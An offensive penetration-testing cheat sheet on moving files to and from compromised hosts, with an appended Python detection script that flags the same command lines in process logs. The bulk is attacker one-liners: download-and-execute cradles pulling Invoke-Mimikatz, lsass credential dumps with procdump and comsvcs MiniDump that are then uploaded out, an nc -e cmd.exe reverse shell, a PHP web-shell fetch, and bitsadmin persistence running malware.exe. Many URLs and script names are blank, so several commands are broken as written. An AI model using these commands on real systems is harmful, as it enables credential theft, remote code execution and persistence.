File Transfer

Basic commands

python -m SimpleHTTPServer 80
php -S

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source " -Destination C:\temp\nc.exe")
powershell.exe wget "" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri -OutFile C:\Users\kostas\Desktop\41020.exe"
powershell Invoke-WebRequest -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

Execute ps1 files

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1

Load it into memory

IEX(New-Object Net.WebClient).downloadString('')
powershell iex(new-object net.webclient).downloadstring(\"\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"\")


echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1


python3 /usr/share/doc/python3-impacket/examples/ a . -smb2support
net view \\
copy \\\a\nc.exe .
copy nc2.exe \\\a\nc2.exe

SMB with password + lsass dump

python3 /usr/share/doc/python3-impacket/examples/ a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMP\a.txt.dmp s:

Execute nc via SMB (bypass defenses)

\\\SHARE\nc.exe -nv 4444 -e cmd.exe


ncat -lvp 80 > nc2.exe
nc -nv < nc.exe -w 15

Copy files from target to Kali

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('', 'zzzzzz.txt.dmp')

nc -lvp 9999 > lsasss.dmp

With PHP

echo "<?php file_put_contents('nameOfFile', fopen('', 'r')); ?>" > down2.php

./curl -F 'file=@firefox.exe_190824_231811.dmp' -v


cat > /dev/tcp/10.x.x.x.x/9001
nc -lvp 9001 >

fetch (OpenBSD)

<?php system("fetch -o /usr/local/databases/shell.php; php /usr/local/databases/shell.php"); ?>

rdesktop or remmina

rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>


Download file into the C:\Windows folder.

> bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download

Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed.

Create persistence.

> bitsadmin /create persistence
> bitsadmin /addfile persistence c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence
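
Seen from the defender's side, the command lines on this page leave recognisable process-creation records (for instance Sysmon Event ID 1, or Windows Event 4688 with command-line auditing enabled). The following Python example is added here and is not part of the original page: the rule names, the sample events and the `example.test` hosts are constructed for illustration, and it assumes the command line is available as logged plain text.

```python
import re

# Hypothetical rule names; each regex targets one command-line shape from this page.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*[-/]f\b", re.I)),
    ("bitsadmin_download",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/(transfer|addfile)\b", re.I)),
    ("bitsadmin_notify_persistence",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/setnotifycmdline\b", re.I)),
    ("powershell_web_transfer",
     re.compile(r"\b(downloadstring|downloadfile|uploadfile|invoke-webrequest|start-bitstransfer)\b", re.I)),
    ("powershell_execpolicy_bypass",
     re.compile(r"\bpowershell(\.exe)?\b.*-(ep|exec|executionpolicy)\s+bypass\b", re.I)),
    ("comsvcs_minidump",
     re.compile(r"\brundll32(\.exe)?\b.*comsvcs\.dll.*minidump\b", re.I)),
    ("procdump_lsass",
     re.compile(r"\bprocdump(64)?(\.exe)?\b.*\blsass\b", re.I)),
    ("exe_run_from_unc_share",
     re.compile(r"^\\\\[^\\\s]+\\\S+?\.exe\b", re.I)),
]

def classify(command_line):
    """Return the names of every rule matching one process command line."""
    text = " ".join(command_line.split())  # collapse runs of whitespace
    return [name for name, pattern in RULES if pattern.search(text)]

def scan(events):
    """Return (command_line, matched_rules) for each event that hit a rule."""
    hits = [(event, classify(event)) for event in events]
    return [(event, rules) for event, rules in hits if rules]

# Constructed sample events; hosts under example.test are placeholders.
SAMPLE_EVENTS = [
    r'certutil.exe -urlcache -split -f "http://files.example.test/nc.exe" c:\temp\nc.exe',
    r"bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL",
    r"powershell -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://files.example.test/a.ps1')",
    r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full",
    r"procdump.exe -ma lsass.exe c:\TEMP\a.txt",
    r"\\fileserver.example.test\SHARE\nc.exe -nv",
    r"certutil.exe -hashfile c:\temp\setup.exe SHA256",   # benign use
    r"bitsadmin /list /allusers",                          # benign use
]

if __name__ == "__main__":
    for event, rules in scan(SAMPLE_EVENTS):
        print(", ".join(rules), "<-", event)
```

The two benign events show why the rules key on the transfer and notify switches rather than on the binary name alone: `certutil` and `bitsadmin` both have routine administrative uses.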

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates, and can use HTTP basic auth.

or simply:

python -m SimpleHTTPServer 8080

or HTTPS with upload 😎

